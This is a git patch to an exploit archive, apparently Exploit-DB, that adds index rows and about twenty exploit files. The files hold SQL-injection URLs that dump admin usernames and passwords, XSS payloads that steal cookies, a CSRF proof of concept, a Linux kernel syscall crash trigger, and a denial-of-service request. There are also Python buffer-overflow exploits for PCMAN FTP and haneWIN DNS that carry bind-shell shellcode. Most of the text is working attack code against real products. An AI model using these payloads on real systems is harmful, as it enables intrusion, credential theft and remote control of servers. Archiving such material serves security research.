From 5f29698d9127cfb10b3312b1277055c02602e03a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 1 Feb 2014 04:26:32 +0000 Subject: [PATCH] Updated 02_01_2014 --- files.csv | 20 ++++++++ platforms/hardware/remote/31298.txt | 7 +++ platforms/jsp/webapps/31299.txt | 9 ++++ platforms/linux/dos/31305.c | 74 ++++++++++++++++++++++++++++ platforms/php/webapps/31256.txt | 48 ++++++++++++++++++ platforms/php/webapps/31288.txt | 7 +++ platforms/php/webapps/31289.txt | 9 ++++ platforms/php/webapps/31290.txt | 7 +++ platforms/php/webapps/31291.txt | 7 +++ platforms/php/webapps/31292.txt | 7 +++ platforms/php/webapps/31293.txt | 8 +++ platforms/php/webapps/31294.txt | 7 +++ platforms/php/webapps/31295.txt | 9 ++++ platforms/php/webapps/31296.txt | 9 ++++ platforms/php/webapps/31297.txt | 7 +++ platforms/php/webapps/31303.txt | 7 +++ platforms/php/webapps/31304.txt | 9 ++++ platforms/windows/dos/31302.txt | 12 +++++ platforms/windows/remote/31254.py | 66 +++++++++++++++++++++++++ platforms/windows/remote/31255.py | 66 +++++++++++++++++++++++++ platforms/windows/remote/31260.py | 76 +++++++++++++++++++++++++++++ 21 files changed, 471 insertions(+) create mode 100755 platforms/hardware/remote/31298.txt create mode 100755 platforms/jsp/webapps/31299.txt create mode 100755 platforms/linux/dos/31305.c create mode 100755 platforms/php/webapps/31256.txt create mode 100755 platforms/php/webapps/31288.txt create mode 100755 platforms/php/webapps/31289.txt create mode 100755 platforms/php/webapps/31290.txt create mode 100755 platforms/php/webapps/31291.txt create mode 100755 platforms/php/webapps/31292.txt create mode 100755 platforms/php/webapps/31293.txt create mode 100755 platforms/php/webapps/31294.txt create mode 100755 platforms/php/webapps/31295.txt create mode 100755 platforms/php/webapps/31296.txt create mode 100755 platforms/php/webapps/31297.txt create mode 100755 platforms/php/webapps/31303.txt create mode 100755 platforms/php/webapps/31304.txt create mode 100755 platforms/windows/dos/31302.txt create mode 100755 platforms/windows/remote/31254.py create mode 100755 platforms/windows/remote/31255.py create mode 100755 platforms/windows/remote/31260.py diff --git a/files.csv b/files.csv index 62a7b5d5f..49f6f0b24 100755 --- a/files.csv +++ b/files.csv @@ -28068,7 +28068,11 @@ id,file,description,date,author,platform,type,port 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80 +31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0 +31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 @@ -28094,3 +28098,19 @@ id,file,description,date,author,platform,type,port 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module 'artid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31290,platforms/php/webapps/31290.txt,"auraCMS 2.2 'lihatberita' Module 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31291,platforms/php/webapps/31291.txt,"Joomla! and Mambo 'com_publication' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 +31292,platforms/php/webapps/31292.txt,"Joomla! and Mambo 'com_blog' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 +31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 +31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability",2008-02-25,-=Mizo=-,php,webapps,0 +31295,platforms/php/webapps/31295.txt,"Joomla! and Mambo 'com_wines' 1.0 Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 +31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 'section' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 +31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 +31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0 +31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0 +31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 +31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0 +31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0 +31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 diff --git a/platforms/hardware/remote/31298.txt b/platforms/hardware/remote/31298.txt new file mode 100755 index 000000000..75cfd0536 --- /dev/null +++ b/platforms/hardware/remote/31298.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27982/info + +Packeteer PacketShaper and PolicyCenter are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +https://www.example.com/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/31299.txt b/platforms/jsp/webapps/31299.txt new file mode 100755 index 000000000..8d4780a2f --- /dev/null +++ b/platforms/jsp/webapps/31299.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27986/info + +Alkacon OpenCms is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +OpenCms 7.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ \ No newline at end of file diff --git a/platforms/linux/dos/31305.c b/platforms/linux/dos/31305.c new file mode 100755 index 000000000..1877d47f2 --- /dev/null +++ b/platforms/linux/dos/31305.c @@ -0,0 +1,74 @@ +/* + * PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage + * + * https://code.google.com/p/chromium/issues/detail?id=338594 + * + * $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#define __X32_SYSCALL_BIT 0x40000000 +#undef __NR_recvmmsg +#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) + +int +main(void) +{ +#define VLEN 10 +#define BUFSIZE 200 +#define TIMEOUT 1 + int sockfd, retval, i; + struct sockaddr_in sa; + struct mmsghdr msgs[VLEN]; + struct iovec iovecs[VLEN]; + char bufs[VLEN][BUFSIZE+1]; + struct timespec timeout; + + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + if (sockfd == -1) { + perror("socket()"); + exit(EXIT_FAILURE); + } + + sa.sin_family = AF_INET; + sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + sa.sin_port = htons(1234); + if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { + perror("bind()"); + exit(EXIT_FAILURE); + } + + memset(msgs, 0, sizeof(msgs)); + for (i = 0; i < VLEN; i++) { + iovecs[i].iov_base = bufs[i]; + iovecs[i].iov_len = BUFSIZE; + msgs[i].msg_hdr.msg_iov = &iovecs[i]; + msgs[i].msg_hdr.msg_iovlen = 1; + } + + timeout.tv_sec = TIMEOUT; + timeout.tv_nsec = 0; + +// retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout); +// retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout); + retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul); + if (retval == -1) { + perror("recvmmsg()"); + exit(EXIT_FAILURE); + } + + printf("%d messages received\n", retval); + for (i = 0; i < retval; i++) { + bufs[i][msgs[i].msg_len] = 0; + printf("%d %s", i+1, bufs[i]); + } + exit(EXIT_SUCCESS); +} \ No newline at end of file diff --git a/platforms/php/webapps/31256.txt b/platforms/php/webapps/31256.txt new file mode 100755 index 000000000..5fa608fd4 --- /dev/null +++ b/platforms/php/webapps/31256.txt @@ -0,0 +1,48 @@ +# Exploit Title: linPHA 1.3.4 - Pemanent XSS and CSRF +# Date: 28/01/2014 +# Exploit Author: killall-9@mail.com +# Vendor Homepage: http://sourceforge.net/projects/linpha/ +# Software Link: http://sourceforge.net/projects/linpha/files/latest/download +# Version: 1.3.4 +# Tested on: Virtualbox (debian) and Apache + +===[ Exploit ]=== + +1) Permanent XSS=> +..... +POST /linpha-1.3.4/actions/submit_mod_data.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/linpha-1.3.4/admin.php?page=mysettings +Cookie: PHPSESSID=bbdjarqpmknfpubtnc29rgodu0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 153 + +friend_user_name=admin&friend_full_name=%3Cscript%3Ealert%28%22xss+here%22%29%3B%3C%2Fscript%3E&friend_user_mail=admin%40gmail.com&id=1&action=frienduser +..... + + +2) CSRF (poc)=> +..... + + +Pinata-CSRF-Tool + + +
+ + + + + +
+ + +..... + +These vulnerabilities was found in the administration panel. +cheerZ.: diff --git a/platforms/php/webapps/31288.txt b/platforms/php/webapps/31288.txt new file mode 100755 index 000000000..c63ee2c8b --- /dev/null +++ b/platforms/php/webapps/31288.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27956/info + +The Joomla! and Mambo 'com_hello_world' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31289.txt b/platforms/php/webapps/31289.txt new file mode 100755 index 000000000..d1ad37170 --- /dev/null +++ b/platforms/php/webapps/31289.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27957/info + +The Gallery module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Gallery 1.3 is vulnerable; other versions may also be affected. + +http://www.example.com/modules.php?name=Sections&sop=printpage&artid=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** \ No newline at end of file diff --git a/platforms/php/webapps/31290.txt b/platforms/php/webapps/31290.txt new file mode 100755 index 000000000..24172c00c --- /dev/null +++ b/platforms/php/webapps/31290.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27959/info + +auraCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?pilih=lihatberita&id=-9999999/**/union/**/select/**/0,1,password,3,4,user,6/**/from/**/user/*where%20admin1/** \ No newline at end of file diff --git a/platforms/php/webapps/31291.txt b/platforms/php/webapps/31291.txt new file mode 100755 index 000000000..7bddc03e9 --- /dev/null +++ b/platforms/php/webapps/31291.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27970/info + +The Joomla! and Mambo 'com_publication' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31292.txt b/platforms/php/webapps/31292.txt new file mode 100755 index 000000000..33cc3d033 --- /dev/null +++ b/platforms/php/webapps/31292.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27971/info + +The 'com_blog' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL_INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/31293.txt b/platforms/php/webapps/31293.txt new file mode 100755 index 000000000..396c70a5f --- /dev/null +++ b/platforms/php/webapps/31293.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/27972/info + +Gary's Cookbook module for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+f +rom%2F%2A%2A%2Fmos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31294.txt b/platforms/php/webapps/31294.txt new file mode 100755 index 000000000..a22eb2648 --- /dev/null +++ b/platforms/php/webapps/31294.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27973/info + +The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/* \ No newline at end of file diff --git a/platforms/php/webapps/31295.txt b/platforms/php/webapps/31295.txt new file mode 100755 index 000000000..5f1225b4f --- /dev/null +++ b/platforms/php/webapps/31295.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27975/info + +The 'com_wines' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_wines&Itemid=S@BUN&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,use +rname+from%2F%2A%2A%2Fmos_users/* + diff --git a/platforms/php/webapps/31296.txt b/platforms/php/webapps/31296.txt new file mode 100755 index 000000000..a8a610f8e --- /dev/null +++ b/platforms/php/webapps/31296.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27977/info + +Simple Shop component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(usernam +e,0x3a,password)/**/from/**/jos_users/* + diff --git a/platforms/php/webapps/31297.txt b/platforms/php/webapps/31297.txt new file mode 100755 index 000000000..7a5c558de --- /dev/null +++ b/platforms/php/webapps/31297.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27980/info + +The 'Sell' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 \ No newline at end of file diff --git a/platforms/php/webapps/31303.txt b/platforms/php/webapps/31303.txt new file mode 100755 index 000000000..6932dbe21 --- /dev/null +++ b/platforms/php/webapps/31303.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27994/info + +The Joomla! and Mambo 'com_inter' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user \ No newline at end of file diff --git a/platforms/php/webapps/31304.txt b/platforms/php/webapps/31304.txt new file mode 100755 index 000000000..ad66c5b38 --- /dev/null +++ b/platforms/php/webapps/31304.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27999/info + +Plume CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects Plume CMS 1.2.2; other versions may be affected as well. + +http://www.example.com/manager/xmedia.php?dir=theme/default/&mode= \ No newline at end of file diff --git a/platforms/windows/dos/31302.txt b/platforms/windows/dos/31302.txt new file mode 100755 index 000000000..661319b23 --- /dev/null +++ b/platforms/windows/dos/31302.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/27993/info + +SurgeFTP is prone to a remote denial-of-service vulnerability because it fails to perform adequately boundary checks on user-supplied input. + +Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users. + +SurgeFTP 2.3a2 is vulnerable; other versions may also be affected. + +GET / HTTP/1.0 +Content-Length: 2147483647 + +boom diff --git a/platforms/windows/remote/31254.py b/platforms/windows/remote/31254.py new file mode 100755 index 000000000..5c489c400 --- /dev/null +++ b/platforms/windows/remote/31254.py @@ -0,0 +1,66 @@ +# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow +# Date: Jan 25,2014 +# Exploit Author: Mahmod Mahajna (Mahy) +# Version: 2.07 +# Tested on: Windows 7 sp1 x64 (english) +# Email: m.dofo123@gmail.com +import socket as s +from sys import argv +# +if(len(argv) != 4): + print "USAGE: %s host " % argv[0] + exit(1) +else: + #store command line arguments + script,host,fuser,fpass=argv + #vars + junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars + espaddress = '\x59\x06\xbb\x76' # 76BB0659 + nops = '\x90' * 10 + shellcode = ( # BIND SHELL | PORT 4444 + "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4" + "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c" + "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07" + "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07" + "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e" + "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f" + "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38" + "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65" + "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a" + "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74" + "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5" + "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80" + "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4" + "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80" + "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82" + "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a" + "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70" + "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6" + "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4" + "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6" + "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4" + "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53" + "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84" + "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51" + "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd") + sploit = junk+espaddress+nops+shellcode + #create socket + conn = s.socket(s.AF_INET,s.SOCK_STREAM) + #establish connection to server + conn.connect((host,21)) + #post ftp user + conn.send('USER '+fuser+'\r\n') + #wait for response + uf = conn.recv(1024) + #post ftp password + conn.send('PASS '+fpass+'\r\n') + #wait for response + pf = conn.recv(1024) + #send ftp command with sploit + conn.send('ABOR '+sploit+'\r\n') + cf = conn.recv(1024) + #close connection + conn.close() + + + diff --git a/platforms/windows/remote/31255.py b/platforms/windows/remote/31255.py new file mode 100755 index 000000000..f8fa843ec --- /dev/null +++ b/platforms/windows/remote/31255.py @@ -0,0 +1,66 @@ +# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow +# Date: Jan 25,2014 +# Exploit Author: Mahmod Mahajna (Mahy) +# Version: 2.07 +# Tested on: Windows 7 sp1 x64 (english) +# Email: m.dofo123@gmail.com +import socket as s +from sys import argv +# +if(len(argv) != 4): + print "USAGE: %s host " % argv[0] + exit(1) +else: + #store command line arguments + script,host,fuser,fpass=argv + #vars + junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars + espaddress = '\x59\x06\xbb\x76' # 76BB0659 + nops = '\x90' * 10 + shellcode = ( # BIND SHELL | PORT 4444 + "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4" + "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c" + "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07" + "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07" + "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e" + "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f" + "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38" + "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65" + "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a" + "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74" + "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5" + "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80" + "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4" + "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80" + "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82" + "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a" + "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70" + "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6" + "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4" + "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6" + "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4" + "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53" + "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84" + "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51" + "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd") + sploit = junk+espaddress+nops+shellcode + #create socket + conn = s.socket(s.AF_INET,s.SOCK_STREAM) + #establish connection to server + conn.connect((host,21)) + #post ftp user + conn.send('USER '+fuser+'\r\n') + #wait for response + uf = conn.recv(1024) + #post ftp password + conn.send('PASS '+fpass+'\r\n') + #wait for response + pf = conn.recv(1024) + #send ftp command with sploit + conn.send('CWD '+sploit+'\r\n') + cf = conn.recv(1024) + #close connection + conn.close() + + + diff --git a/platforms/windows/remote/31260.py b/platforms/windows/remote/31260.py new file mode 100755 index 000000000..e2434acbb --- /dev/null +++ b/platforms/windows/remote/31260.py @@ -0,0 +1,76 @@ +#!/usr/bin/python + +# Exploit Title: haneWIN DNS Server (SEH) +# Author: Dario Estrada (dash) https://intrusionlabs.org +# Date: 2014-01-29 +# Version: haneWIN DNS Server 1.5.3 +# Vendor Homepage: http://www.hanewin.net/ +# Vulnerable app link:http://www.hanewin.net/dns-e.htm +# Tested on: Windows XP SP3 +# Thanks to God, to my family and all my friends for always being there +# +# Description: +# A SEH overflow occurs when large amount of data is sent to the server +# +import socket, sys, os, time + +usage = "\n Usage: " + sys.argv[0] + " \n" + +if len(sys.argv) < 2: + print usage + sys.exit(0) + +host = sys.argv[1] + +shellcode = ( +#msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d' +"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" 